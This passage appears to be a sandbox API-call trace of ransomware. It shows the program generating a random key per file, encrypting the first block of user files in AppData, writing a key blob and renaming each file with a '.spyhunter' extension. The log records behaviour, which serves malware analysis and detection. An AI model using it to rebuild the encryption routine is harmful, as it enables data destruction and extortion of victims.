0x2c0000 [0140.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.344] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.344] WriteFile (in: hFile=0xec, lpBuffer=0x57f244*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f204, lpOverlapped=0x0 | out: lpBuffer=0x57f244*, lpNumberOfBytesWritten=0x57f204*=0x4, lpOverlapped=0x0) returned 1 [0140.344] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f204, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f204*=0x30, lpOverlapped=0x0) returned 1 [0140.345] CloseHandle (hObject=0xec) returned 1 [0140.345] GetProcessHeap () returned 0x2c0000 [0140.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.345] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.spyhunter") returned 149 [0140.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk.spyhunter")) returned 1 [0140.346] GetProcessHeap () returned 0x2c0000 [0140.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.346] GetProcessHeap () returned 0x2c0000 [0140.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.346] GetProcessHeap () returned 0x2c0000 [0140.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de7d10 | out: hHeap=0x2c0000) returned 1 [0140.346] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f240 | out: pbBuffer=0x57f240) returned 1 [0140.346] GetProcessHeap () returned 0x2c0000 [0140.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.346] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f238*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f238*=0x30) returned 1 [0140.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0140.348] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 131 [0140.348] StrStrW (lpFirst="Windows Explorer.lnk", lpSrch=".txt") returned 0x0 [0140.348] GetProcessHeap () returned 0x2c0000 [0140.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.348] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f1fc*=0x4cc, lpOverlapped=0x0) returned 1 [0140.407] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffb34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.407] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4cc, lpNumberOfBytesWritten=0x57f1fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f1fc*=0x4cc, lpOverlapped=0x0) returned 1 [0140.407] GetProcessHeap () returned 0x2c0000 [0140.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.407] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.407] WriteFile (in: hFile=0xec, lpBuffer=0x57f23c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1fc, lpOverlapped=0x0 | out: lpBuffer=0x57f23c*, lpNumberOfBytesWritten=0x57f1fc*=0x4, lpOverlapped=0x0) returned 1 [0140.407] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f1fc*=0x30, lpOverlapped=0x0) returned 1 [0140.407] CloseHandle (hObject=0xec) returned 1 [0140.407] GetProcessHeap () returned 0x2c0000 [0140.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0140.407] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.spyhunter") returned 141 [0140.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.spyhunter")) returned 1 [0140.408] GetProcessHeap () returned 0x2c0000 [0140.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0140.409] GetProcessHeap () returned 0x2c0000 [0140.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.409] GetProcessHeap () returned 0x2c0000 [0140.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc5000 | out: hHeap=0x2c0000) returned 1 [0140.409] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f240 | out: pbBuffer=0x57f240) returned 1 [0140.409] GetProcessHeap () returned 0x2c0000 [0140.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.409] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f238*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f238*=0x30) returned 1 [0140.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0140.410] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk") returned 127 [0140.410] StrStrW (lpFirst="Launch Internet Explorer Browser.lnk", lpSrch=".txt") returned 0x0 [0140.410] GetProcessHeap () returned 0x2c0000 [0140.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.410] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f1fc*=0x5a7, lpOverlapped=0x0) returned 1 [0140.436] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffa59, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.436] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x5a7, lpNumberOfBytesWritten=0x57f1fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f1fc*=0x5a7, lpOverlapped=0x0) returned 1 [0140.437] GetProcessHeap () returned 0x2c0000 [0140.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.437] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.437] WriteFile (in: hFile=0xec, lpBuffer=0x57f23c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1fc, lpOverlapped=0x0 | out: lpBuffer=0x57f23c*, lpNumberOfBytesWritten=0x57f1fc*=0x4, lpOverlapped=0x0) returned 1 [0140.437] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f1fc*=0x30, lpOverlapped=0x0) returned 1 [0140.437] CloseHandle (hObject=0xec) returned 1 [0140.437] GetProcessHeap () returned 0x2c0000 [0140.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.437] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk.spyhunter") returned 137 [0140.437] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk.spyhunter")) returned 1 [0140.439] GetProcessHeap () returned 0x2c0000 [0140.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.439] GetProcessHeap () returned 0x2c0000 [0140.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.439] GetProcessHeap () returned 0x2c0000 [0140.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf7e0 | out: hHeap=0x2c0000) returned 1 [0140.442] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f230 | out: pbBuffer=0x57f230) returned 1 [0140.442] GetProcessHeap () returned 0x2c0000 [0140.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.442] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f228*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f228*=0x30) returned 1 [0140.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0140.637] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx") returned 122 [0140.638] StrStrW (lpFirst="Built-In Building Blocks.dotx", lpSrch=".txt") returned 0x0 [0140.638] GetProcessHeap () returned 0x2c0000 [0140.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.638] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f1ec*=0x2800, lpOverlapped=0x0) returned 1 [0140.639] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.639] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f1ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f1ec*=0x2800, lpOverlapped=0x0) returned 1 [0140.639] GetProcessHeap () returned 0x2c0000 [0140.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.640] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.640] WriteFile (in: hFile=0x178, lpBuffer=0x57f22c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1ec, lpOverlapped=0x0 | out: lpBuffer=0x57f22c*, lpNumberOfBytesWritten=0x57f1ec*=0x4, lpOverlapped=0x0) returned 1 [0140.751] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f1ec*=0x30, lpOverlapped=0x0) returned 1 [0140.751] CloseHandle (hObject=0x178) returned 1 [0140.751] GetProcessHeap () returned 0x2c0000 [0140.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.751] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.spyhunter") returned 132 [0140.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx.spyhunter")) returned 1 [0140.752] GetProcessHeap () returned 0x2c0000 [0140.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.752] GetProcessHeap () returned 0x2c0000 [0140.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.752] GetProcessHeap () returned 0x2c0000 [0140.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf698 | out: hHeap=0x2c0000) returned 1 [0140.753] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f228 | out: pbBuffer=0x57f228) returned 1 [0140.753] GetProcessHeap () returned 0x2c0000 [0140.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.753] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f220*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f220*=0x30) returned 1 [0140.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0140.823] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 77 [0140.823] StrStrW (lpFirst="CUSTOM.DIC", lpSrch=".txt") returned 0x0 [0140.823] GetProcessHeap () returned 0x2c0000 [0140.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.823] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f1e4*=0x2, lpOverlapped=0x0) returned 1 [0140.824] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffffe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.824] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x57f1e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f1e4*=0x2, lpOverlapped=0x0) returned 1 [0140.824] GetProcessHeap () returned 0x2c0000 [0140.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.824] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.824] WriteFile (in: hFile=0x178, lpBuffer=0x57f224*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1e4, lpOverlapped=0x0 | out: lpBuffer=0x57f224*, lpNumberOfBytesWritten=0x57f1e4*=0x4, lpOverlapped=0x0) returned 1 [0140.824] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f1e4*=0x30, lpOverlapped=0x0) returned 1 [0140.824] CloseHandle (hObject=0x178) returned 1 [0140.824] GetProcessHeap () returned 0x2c0000 [0140.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.824] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.spyhunter") returned 87 [0140.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic.spyhunter")) returned 1 [0140.825] GetProcessHeap () returned 0x2c0000 [0140.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.825] GetProcessHeap () returned 0x2c0000 [0140.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.825] GetProcessHeap () returned 0x2c0000 [0140.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ef60 | out: hHeap=0x2c0000) returned 1 [0140.827] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f220 | out: pbBuffer=0x57f220) returned 1 [0140.827] GetProcessHeap () returned 0x2c0000 [0140.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.827] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f218*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f218*=0x30) returned 1 [0140.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0140.827] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 81 [0140.827] StrStrW (lpFirst="Normal.dotm", lpSrch=".txt") returned 0x0 [0140.827] GetProcessHeap () returned 0x2c0000 [0140.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.827] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f1dc*=0x2800, lpOverlapped=0x0) returned 1 [0140.929] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.929] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f1dc*=0x2800, lpOverlapped=0x0) returned 1 [0140.930] GetProcessHeap () returned 0x2c0000 [0140.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.930] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.930] WriteFile (in: hFile=0x178, lpBuffer=0x57f21c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f1dc, lpOverlapped=0x0 | out: lpBuffer=0x57f21c*, lpNumberOfBytesWritten=0x57f1dc*=0x4, lpOverlapped=0x0) returned 1 [0140.947] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f1dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f1dc*=0x30, lpOverlapped=0x0) returned 1 [0140.947] CloseHandle (hObject=0x178) returned 1 [0140.947] GetProcessHeap () returned 0x2c0000 [0140.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.947] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.spyhunter") returned 91 [0140.947] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm.spyhunter")) returned 1 [0140.948] GetProcessHeap () returned 0x2c0000 [0140.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.948] GetProcessHeap () returned 0x2c0000 [0140.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.948] GetProcessHeap () returned 0x2c0000 [0140.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63d68 | out: hHeap=0x2c0000) returned 1 [0140.950] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f218 | out: pbBuffer=0x57f218) returned 1 [0140.951] GetProcessHeap () returned 0x2c0000 [0140.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.951] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f210*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f210*=0x30) returned 1 [0140.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0140.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 105 [0140.953] StrStrW (lpFirst="InstallTime20131025151332", lpSrch=".txt") returned 0x0 [0140.953] GetProcessHeap () returned 0x2c0000 [0140.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.953] ReadFile (in: hFile=0x178, 